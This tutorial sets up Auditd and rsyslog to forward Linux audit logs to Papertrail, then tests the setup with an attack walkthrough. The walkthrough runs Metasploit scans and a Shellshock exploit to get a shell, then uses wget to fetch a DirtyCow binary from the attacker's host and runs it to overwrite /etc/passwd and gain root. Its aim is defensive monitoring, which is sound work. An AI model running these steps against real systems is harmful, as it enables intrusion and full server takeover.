When it comes to managing risk and ensuring the safety of the data within your network, auditing and managing log data is one of the most important components of any monitoring solution. Keeping detailed records of user activities or changes on your critical systems helps you understand what is occurring within your environment and detect risks in real time.
This tutorial will demonstrate deploying Auditd on a standard web server to monitor user logins, modifications to the /etc/passwd file, and changes to any file in the web server directory. We’ll set up Auditd monitoring and then use a penetration testing tool called Metasploit to trigger a warning. We’ll also show you how to use SolarWinds® Papertrail™ to notify you of critical system file or directory changes.
Introduction to Auditd
The Linux 2.6 kernel has the ability to log events such as system calls and file access with a tool called Auditd. All Auditd log files are stored locally and can be parsed or filtered in order to review failed login attempts, user commands, account modifications, and file system changes.
Auditd also integrates with syslog, which provides enhanced monitoring capabilities like alerting and log archival. Syslog lets you send Auditd log data directly to Papertrail, so you can keep an offsite copy for log analysis. The logs remain accessible even if the target machine is compromised or an attacker tries to cover their tracks by deleting the local logs. That’s why storing logs off-machine is often a compliance requirement.
Setting up Auditd
In this example, we will focus on monitoring the web service directory and the /etc/passwd file. By monitoring the passwd file and web server directories, IT administrators can see website file changes and any access modifications. To monitor these two locations, you will need to create an audit rule. All audit rules are located in the /etc/audit/audit.rules file. Edit the file and add two lines to monitor the web directory and the /etc/passwd file. Use -w to watch the specified file or directory and -k to assign a key, which makes generating reports simpler.
-w /var/www/html -k WEB
-w /etc/passwd -k USERS
Then run the following command to restart the Auditd service and start logging changes. All Auditd logs will be stored in the /var/log/audit/ directory.
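The restart command isn’t shown here; on the CentOS 6.7 system used later in this tutorial, the init-script syntax would typically be:

```shell
# Reload auditd so the new watch rules take effect (CentOS 6 init-script syntax)
sudo service auditd restart
```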
Papertrail offers a step-by-step guide for determining which syslog daemon you are running. In this example, on CentOS 6.7, the system logger is rsyslog. First, you will need to create a configuration file so rsyslog knows to monitor your Auditd log file. To create the configuration file, run the following command:
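A typical approach is to create a new file under /etc/rsyslog.d/ (the filename 25-auditd.conf here is an assumption; any .conf name in that directory works):

```
sudo vi /etc/rsyslog.d/25-auditd.conf
```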
Insert the following lines:
$ModLoad imfile
$InputFileName /var/log/audit/audit.log
$InputFileTag audit
$InputFileStateFile audit-file1
$InputFileSeverity info
$InputFileFacility local6
$InputRunFileMonitor
$InputFilePersistStateInterval 1000
Save the file and exit the file editor. Now edit the rsyslog configuration file with the following command:
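On CentOS, the main rsyslog configuration file lives at /etc/rsyslog.conf:

```
sudo vi /etc/rsyslog.conf
```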
Scroll down to the bottom of the file and add the Papertrail log destination.
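The destination line uses rsyslog’s standard remote-forwarding syntax (a single @ forwards over UDP):

```
*.* @logsN.papertrailapp.com:XXXXX
```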
Replace the “logsN” and “XXXXX” with the host and port from your Papertrail > Settings > Log Destinations page. (Note: The destination in this example will not have any group.)
Then restart the syslog server by running the following command:
sudo /etc/init.d/rsyslog restart
Now you can see syslog data arriving in the Papertrail Events page.
Tracking Logins and File Changes
Now that audit logs are configured, you can test the configuration in a few different ways. You can first try logging into the server with an incorrect password via SSH.
Run the following command to view the audit log entries:
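The command isn’t shown here; you can dump the raw log directly (root privileges are usually required):

```
sudo cat /var/log/audit/audit.log
```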
You can see the failed login was captured by the Auditd service.
Next, try creating a file in the web directory by running this command:
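Any file name will do, since the audit rule watches the whole directory; for example:

```
# Create a test file inside the watched web directory (the filename is arbitrary)
sudo touch /var/www/html/testfile.html
```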
This time, instead of listing the whole file contents, you can filter out only changes made to the web directory by using the key you configured in the audit rule:
cat /var/log/audit/audit.log | grep WEB
You can see data in the log file, but it is difficult to read. Auditd provides a cleaner way to filter this log data using aureport. Run the following command to generate a report filtered by key:
aureport -k -i | grep WEB
You can see touch and list commands are being captured for the user root.
Auditd also provides another solution for searching through your log data. You can use ausearch to keep track of all events for each user or even filter by date and time. To run searches for a user, you will need to find the UID for the user account. Check for the UID by running the following command:
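One simple way to look up a UID is the id command; for root it prints 0, which is the value used with ausearch next:

```shell
# Print the numeric UID of the root account
id -u root
```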
Run this command to see all events for the root user:
ausearch -ui 0 --interpret
Here you can see the commands issued by the root user. Now that you can track authorized system access, let’s see how Auditd can track unauthorized access attempts and changes to the system.
Exploiting the System
This exploit demonstration will be implemented using the newest version of Kali Linux. To begin, start a port scan with nmap with the following command:
nmap <ipaddress of webserver>
In this example, you can see SSH, HTTP, and RPC ports are open. I’ve highlighted the HTTP port in red. Let’s run some additional scans to see what we can find.
One of the most powerful tools pre-installed on all Kali Linux distributions is Metasploit. Metasploit contains a large database of exploits we can search through. Start Metasploit with the following command:
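The Metasploit console is launched with:

```
msfconsole
```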
If started successfully, you should see something like this:
The first scan you should run will list any directories provided by the webserver. Search for an HTTP scanner with the following command:
grep http grep dir search scanner
We will use the http/dir_scanner and the http/files_dir web server scanners. Start with dir_scanner by running the following command:
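The module is loaded from the msf prompt; the full path follows Metasploit’s standard auxiliary scanner layout:

```
use auxiliary/scanner/http/dir_scanner
```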
Set RHOSTS to the target IP address with the following command:
set RHOSTS <ip address of target webserver>
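With RHOSTS set, launch the scan from the msf prompt:

```
run
```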
You can see the server has the cgi-bin directory exposed. If the webserver is not properly configured, scripts executing from this directory can be vulnerable to remote code execution. Check for scripts by switching to the files_dir scanner with the following command:
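As with dir_scanner, the module is selected from the msf prompt:

```
use auxiliary/scanner/http/files_dir
```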
Set RHOSTS to the target IP of the webserver and set the path to the cgi-bin directory on the target server, then type:
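The commands aren’t shown here; assuming PATH is the files_dir module’s option for the directory to scan, the sequence would look like:

```
set RHOSTS <ip address of target webserver>
set PATH /cgi-bin
run
```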
You can see that the server has a backup.sh script in the /cgi-bin directory.
To exploit this script, we will test for a possible Shellshock vulnerability, a remote code execution flaw in the bash shell. Search Metasploit with the following command:
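From the msf prompt:

```
search shellshock
```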
Use the apache_mod_cgi_bash_env_exec exploit by running the following command:
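The full module path, as it appears in Metasploit’s exploit tree, is:

```
use exploit/multi/http/apache_mod_cgi_bash_env_exec
```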
Set RHOST to the target IP address of the server and the TARGETURI to the path of the backup.sh script with the following commands:
set RHOST <ip address of target web server>
set TARGETURI /cgi-bin/backup.sh
options
Your configuration should look something like this.
When ready type:
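From the msf prompt:

```
exploit
```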
You can see a command shell has been opened on the target server as the apache user. Auditd has also captured the execution of the backup.sh script when the exploit launched and sent the event to Papertrail.
The apache user runs with limited access, so in order to change system settings, user privileges must be escalated. One of the most reliable tools for privilege escalation attacks is DirtyCow. DirtyCow (CVE-2016-5195) exploits a race condition in the Linux kernel’s copy-on-write (COW) memory subsystem, present in kernels from version 2.6.22 until it was patched in late 2016. Although not pre-installed with Kali Linux, the DirtyCow exploit code can be downloaded from GitHub. Once you download the source, compile it with the following command:
gcc -pthread dirty.c -o dirty -lcrypt
If successful, you should now have a compiled “dirty” binary ready to run. Copy the “dirty” binary to your web directory on the Kali server and start the webserver.
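The copy and webserver startup commands aren’t shown; on a default Kali install, something like the following would work (the Apache web root and service name are assumptions):

```
# Copy the compiled exploit into Kali's default Apache web root and start Apache
sudo cp dirty /var/www/html/
sudo service apache2 start
```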
Now go back to the shell that you opened earlier. Run the following commands to download the “dirty” script to the target webserver and make it executable:
wget http://<ip address of Kali server>/dirty
chmod +x dirty
When you run the “dirty” script, it replaces the /etc/passwd file with a version containing a root password that you set. The root user entry will also be replaced with a user named “fire”. At this point, you may want to back up the passwd file on your webserver, or you will run into issues later. Now run the “dirty” script with the following command:
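The exact invocation depends on the version of the exploit you downloaded; the widely used dirty.c takes the new password as its first argument, so a typical run looks like:

```
# Replace "newpassword" with the root password you want the exploit to set
./dirty newpassword
```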
On the target server you can check the /etc/passwd file and notice that the root user entry has been changed.
Meanwhile, Auditd, syslog, and Papertrail have captured the execution of the “dirty” script, and the modification to the passwd file.
Now you can try logging into the target web server with the “fire” root user.
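Assuming SSH access is allowed for the new account, the login would look like:

```
ssh fire@<ip address of target webserver>
```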
By listing the root directory, you can see that the session has root privileges with full control over the server. You can also see that Auditd is still tracking logins made by the malicious user.
In Papertrail you can set up email alerts for any user matching that username to notify you if your network ever falls victim to the DirtyCow. To set up the alert, navigate to the Papertrail events dashboard and search for “fire”.
Click “Save Search” and name it DirtyCow.
Then click “Save & Setup an Alert”. Select any of the options in the alert list, like PagerDuty, Amazon SNS, or, in this case, Email. Specify the frequency, enter your email address, and click “Create Alert.”
Now, every time the DirtyCow exploit is launched you will receive an email alert. If you’re running a server where the user accounts should not change, you might even want to alert when the passwd file is changed. This should not happen except on days when you run password changes.
You have now successfully configured Auditd, syslog, and Papertrail to monitor critical system files and alert you if your server is ever exploited by a high-risk vulnerability.
There are many other Auditd features that can enhance searching, reporting, and alerting alongside Papertrail. Learn more on the auditd man page. Also, make sure to check out SolarWinds Papertrail to store these logs in a safe place where they can’t be deleted and to alert you to security problems like unexpected use of your root account.